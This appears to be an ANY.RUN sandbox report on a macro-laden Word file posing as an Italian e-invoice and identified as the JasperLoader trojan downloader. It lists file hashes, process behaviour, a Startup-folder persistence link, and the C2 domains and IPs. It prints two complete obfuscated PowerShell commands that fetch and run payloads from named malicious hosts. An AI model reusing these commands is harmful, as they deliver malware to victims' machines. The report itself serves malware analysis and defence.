analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Fatturazione_Elettronica__invio_copia__91091.docm

Full analysis: https://app.any.run/tasks/6a196b7a-f16c-41d8-9a3e-66e5860a8154
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: April 15, 2019, 14:38:29
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
trojan
loader
jasper
maldoc-1
maldoc-4
Indicators:
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5:

EAAAF946108353E686C3CA1B3876B3A1

SHA1:

9D1D50BC2478D8E20B810DF74FB36FB0F41FC717

SHA256:

0A6678204CE53902234517DEF01C42CD6485EFAFE7B4142A10287030F3F1755F

SSDEEP:

1536:YyW1GpbNvFLsNBp7E18oC3hskRSSuclIyTPHkDD+WZbQ8pKVaa:YyW1GqNBJEXIRSSuclIyoDDImHa

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 2240)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2240)
    • JASPER was detected

      • powershell.exe (PID: 3880)
      • powershell.exe (PID: 580)
    • Writes to a start menu file

      • powershell.exe (PID: 580)
    • Connects to CnC server

      • powershell.exe (PID: 580)
  • SUSPICIOUS

    • Executes scripts

      • powershell.exe (PID: 3880)
    • Creates files in the user directory

      • powershell.exe (PID: 3880)
      • powershell.exe (PID: 580)
    • Executes PowerShell scripts

      • WScript.exe (PID: 3652)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2240)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2240)
    • Dropped object may contain Bitcoin addresses

      • powershell.exe (PID: 580)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.docm | Word Microsoft Office Open XML Format document (with Macro) (53.6)
.docx | Word Microsoft Office Open XML Format document (24.2)
.zip | Open Packaging Conventions container (18)
.zip | ZIP compressed archive (4.1)

EXIF

XML

AppVersion: 16
HyperlinksChanged: No
SharedDoc: No
CharactersWithSpaces: 3
LinksUpToDate: No
Company: VPS2day
TitlesOfParts: -
HeadingPairs:
  • Title
  • 1
ScaleCrop: No
Paragraphs: 1
Lines: 1
DocSecurity: None
Application: Microsoft Office Word
Characters: 3
Words: -
Pages: 1
TotalEditTime: 1.8 hours
Template: Normal.dotm
ModifyDate: 2019:03:27 05:20:00Z
CreateDate: 2019:03:27 00:11:00Z
RevisionNumber: 31
LastModifiedBy: VPS2day
Keywords: -

XMP

Description: -
Creator: VPS2day
Subject: -
Title: -

ZIP

ZipFileName: [Content_Types].xml
ZipUncompressedSize: 1900
ZipCompressedSize: 445
ZipCRC: 0x2a6675f6
ZipModifyDate: 1980:01:01 00:00:00
ZipCompression: Deflated
ZipBitFlag: 0x0006
ZipRequiredVersion: 20
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
4
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs #JASPER powershell.exe wscript.exe no specs #JASPER powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2240"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Fatturazione_Elettronica__invio_copia__91091.docm"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
3880"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command if( (Get-UICulture).Name -match 'RU|UA|BY|CN'){ exit; };$wgzuj = [System.IO.Path]::GetTempPath();$ivazta = Join-Path $wgzuj 'Tv_x64x32.exe';$hxzisfx='http://cloud.diminishedvaluecalifornia.com/501?jbtbeg';$cjtsww = Join-Path $wgzuj 'SearchI32.js';$eajtjsi='http://cash.andreachiocca.com/loadercrypt_823EF8A810513A4071485C36DDAD4CC3.php?vid=pecdoc';$yghwtza='(NexVDBQ29w-ObxVDBQ29jexVDBQ29ct NexVDBQ29t.WebClixVDBQ29exVDBQ29nt)xVDBQ29.DownxVDBQ29loxVDBQ29adFxVDBQ29ilxVDBQ29e(xVDBQ29$xVDBQ29exVDBQ29ajxVDBQ29tjsixVDBQ29,$cjtsww)xVDBQ29;' -replace 'xVDBQ29','';iex $yghwtza;Start-Process $cjtsww;$cchgwh='(New-ObTvCvSzzjecTvCvSzztTvCvSzz Net.TvCvSzzWeTvCvSzzbTvCvSzzCTvCvSzzlieTvCvSzznt).DoTvCvSzzwTvCvSzznTvCvSzzloaTvCvSzzdTvCvSzzFTvCvSzzileTvCvSzz($hxziTvCvSzzsfx,$ivazta);' -replace 'TvCvSzz','';iex $cchgwh;Start-Process $ivazta;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
3652"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\SearchI32.js" C:\Windows\System32\WScript.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
580"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" if( (Get-UICulture).Name -match 'RU|UA|BY|CN'){ exit; };$xjzuevw = [System.IO.Path]::GetTempPath();$bibwgtgsybftz = Join-Path $xjzuevw 'SearchI32.txt';$ehvvaffidydbav='http://green.cibariefoodconsulting.com/cryptbody2.php';$bjgii = Join-Path $xjzuevw 'SearchI32.js';$zzbuy='http://green.cibariefoodconsulting.com/loadercrypt_823EF8A810513A4071485C36DDAD4CC3.php';$watszsghvegtdwyuactyahejj = '';$igjzagzthtuxsechw='(New-QW6WR9VObject NeQW6WR9Vt.WebCliQW6WR9VenQW6WR9VtQW6WR9V).DoQW6WR9VwnQW6WR9VloaQW6WR9VdFQW6WR9Vile($ehvvQW6WR9VaffiQW6WR9VdQW6WR9VydQW6WR9Vbav,QW6WR9V$QW6WR9VbibwQW6WR9VgQW6WR9VtgQW6WR9Vsybftz)QW6WR9V;' -replace 'QW6WR9V','';iex $igjzagzthtuxsechw;$ewajzbuvtyjfsxutby='(SvQQ2vtNSvQQ2vtew-ObjSvQQ2vtect NSvQQ2vtet.SvQQ2vtWSvQQ2vtebSvQQ2vtCSvQQ2vtlieSvQQ2vtnSvQQ2vtt)SvQQ2vt.DoSvQQ2vtwSvQQ2vtnloadFile($zzbuy,SvQQ2vt$SvQQ2vtbjgiSvQQ2vtiSvQQ2vt);' -replace 'SvQQ2vt','';iex $ewajzbuvtyjfsxutby;Get-Content $bibwgtgsybftz | Where-Object {$_ -match $regex} | ForEach-Object { $watszsghvegtdwyuactyahejj += $_ -replace '..(.)','$1'};iex $watszsghvegtdwyuactyahejj;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
Total events
2 220
Read events
1 484
Write events
731
Delete events
5

Modification events

(PID) Process:(2240) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:d 4
Value:
64203400C0080000010000000000000000000000
(PID) Process:(2240) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(2240) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(2240) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
1317994526
(PID) Process:(2240) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1317994640
(PID) Process:(2240) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1317994641
(PID) Process:(2240) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation:writeName:MTTT
Value:
C00800007A73ECEF98F3D40100000000
(PID) Process:(2240) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:h"4
Value:
68223400C008000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2240) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:delete valueName:h"4
Value:
68223400C008000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2240) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
Executable files
0
Suspicious files
4
Text files
4
Unknown types
3

Dropped files

PID
Process
Filename
Type
2240WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR5C64.tmp.cvr
MD5:
SHA256:
3880powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\M8D0LQTWZ2AOI6Y5J6OQ.temp
MD5:
SHA256:
580powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YVNK9GD9UNSHVUBRLAZU.temp
MD5:
SHA256:
3880powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFe68a8.TMPbinary
MD5:131DC75F6D4142CA9244945A91A71E8D
SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4
580powershell.exeC:\Users\admin\AppData\Local\Temp\SearchI32.jstext
MD5:61DB6FEC17CBD12A7ADBBE7B2FB73798
SHA256:8B5692831CECBA62E82A81DD3E21337720B30868AD52E24E273B8B4CF9748891
580powershell.exeC:\Users\admin\AppData\Local\Temp\SearchI32.txttext
MD5:59CD427A21EF2F43B0C1E1EB7E3D4ABD
SHA256:51158CC15FE61E74C17212892CF7EAD7B2A91EC216D5D5E5D817B36276DECBC9
580powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Indexing Service SearchI32.lnklnk
MD5:A1852819911EA726A604BA0FF730BD7B
SHA256:89B658EFAAF3DF5F082ECF84D7659FAAA327C577A81A17A6125257E2CFC14223
2240WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:BAEC04A54AC968DB29FEE2F2ABDA0EA1
SHA256:230C0E0381E2EA1B4CED9700B32635C2548CB4B0CE50C1D60F5BF49BA8E63985
580powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:131DC75F6D4142CA9244945A91A71E8D
SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4
3880powershell.exeC:\Users\admin\AppData\Local\Temp\SearchI32.jstext
MD5:1B2C90ED4A0E9EDCAAB7742B6E0594ED
SHA256:363C666FC1319B68B45E2A3D24AABDB5F6961230F936E531CB8C7213C7CD73AD
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
4
DNS requests
4
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3880
powershell.exe
GET
185.158.250.83:80
http://cloud.diminishedvaluecalifornia.com/501?jbtbeg
NL
malicious
3880
powershell.exe
GET
200
185.158.250.114:80
http://cash.andreachiocca.com/loadercrypt_823EF8A810513A4071485C36DDAD4CC3.php?vid=pecdoc
NL
text
21.4 Kb
malicious
580
powershell.exe
GET
200
185.158.251.243:80
http://green.cibariefoodconsulting.com/cryptbody2.php
NL
text
10.4 Kb
malicious
580
powershell.exe
GET
200
185.158.251.243:80
http://green.cibariefoodconsulting.com/loadercrypt_823EF8A810513A4071485C36DDAD4CC3.php
NL
text
13.5 Kb
malicious
580
powershell.exe
GET
200
185.158.251.243:80
http://green.dddownhole.com/?b=USER-PC_DELL_62f21c60&os=6.1.7601.17514&v=408.3&psver=2
NL
text
2 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
580
powershell.exe
185.158.251.243:80
green.cibariefoodconsulting.com
23media GmbH
NL
suspicious
3880
powershell.exe
185.158.250.114:80
cash.andreachiocca.com
M247 Ltd
NL
malicious
3880
powershell.exe
185.158.250.83:80
cloud.diminishedvaluecalifornia.com
M247 Ltd
NL
unknown

DNS requests

Domain
IP
Reputation
cash.andreachiocca.com
  • 185.158.250.114
malicious
cloud.diminishedvaluecalifornia.com
  • 185.158.250.83
malicious
green.cibariefoodconsulting.com
  • 185.158.251.243
malicious
green.dddownhole.com
  • 185.158.251.243
malicious

Threats

PID
Process
Class
Message
3880
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] Trojan-Downloader.Script.Generic (JasperLoader)
580
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] Trojan-Downloader.Script.Generic (JasperLoader)
580
powershell.exe
A Network Trojan was detected
ET TROJAN JasperLoader CnC Checkin
2 ETPRO signatures available at the full report
No debug info